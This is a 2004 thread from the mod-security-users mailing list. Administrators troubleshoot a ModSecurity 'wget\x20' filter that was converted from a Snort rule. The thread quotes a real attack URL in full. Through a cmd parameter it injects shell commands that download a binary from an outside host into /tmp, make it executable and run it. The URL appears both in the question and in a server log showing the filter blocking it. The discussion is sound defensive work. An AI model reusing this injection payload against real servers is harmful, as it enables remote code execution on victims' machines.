Re: [mod-security-users] Problem with snort rules
Brought to you by:
victorhora,
zimmerletw
Menu
▾
▴
Re: [mod-security-users] Problem with snort rules
|
From: Danny S. <dsh...@al...> - 2004-02-04 20:03:23
|
Yes, SecFilters are working. If I append a /bin/ps error on the end of it, I get an error. Log file is also being written to. On 2/4/04 2:53 PM, "L. Christopher Luther" <CL...@Xy...> wrote: > Do any of the other SecFilter filters work? And a silly question, is your > filtering actually turned on (SecFilterEngine On)? > > When I use the URL against one of my internal web servers (Apache Linux), I > receive the following error: > >>>>>>>>>>> > Internal Server Error > The server encountered an internal error or misconfiguration and was unable > to complete your request. > > Please contact the server administrator, xs...@xy... and inform > them of the time the error occurred, and anything you might have done that > may have caused the error. > > More information about this error may be available in the server error log. > <<<<<<<<<< > > And when I check the logs, I see the following (IP addresses and names > obfuscated): > >>>>>>>>>>> > ======================================== > Request: x.x.x.x - - [[04/Feb/2004:14:48:25 --0500]] "GET > /?basepath=http://w > ww.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.trip > od.c > om.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1" 500 541 > Handler: (null) > ---------------------------------------- > GET > /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget% > 20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/vnd.ms- > excel, application/msword, application/x-shockwave-flash, */* > Accept-Language: en-us > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; > brip1; . > NET CLR 1.1.4322) > Host: mysecret > Connection: Keep-Alive > mod_security-message: Access denied with code 500. Pattern match "wget\x20" > at T > HE_REQUEST. > mod_security-action: 500 > > HTTP/1.1 500 Internal Server Error > Content-Length: 541 > Connection: close > Content-Type: text/html; charset=iso-8859-1 > <<<<<<<<<< > > So it appears that my 'SecFilter "wget\x20"' is working. > > > - Christopher > > > -----Original Message----- > From: Danny Shurett [mailto:dsh...@al...] > Sent: Wednesday, February 04, 2004 2:20 PM > To: mod...@li... > Subject: [mod-security-users] Problem with snort rules > > > I am working on getting my filters configured for a number of webservers. I > used a few filters I found in the snort filters that were converted. > However, upon further investigation, it didn't yield what I was looking for. > Here is the one I think should be tripped: > > # WEB-ATTACKS wget command attempt > SecFilter "wget\x20" > > Here is a real url (slightly modified) that was used to attack a server. > > > http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?& > cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi > > > > I would have expected the wget filter above to block it. Can anyone help > me understand why the filter above doesn't block wget? Am I missing the > point? Please be gentle. Thanks. > > > > ------------------------------------------------------- > The SF.Net email is sponsored by EclipseCon 2004 > Premiere Conference on Open Tools Development and Integration > See the breadth of Eclipse activity. February 3-5 in Anaheim, CA. > http://www.eclipsecon.org/osdn > _______________________________________________ > mod-security-users mailing list > mod...@li... > https://lists.sourceforge.net/lists/listinfo/mod-security-users > > |
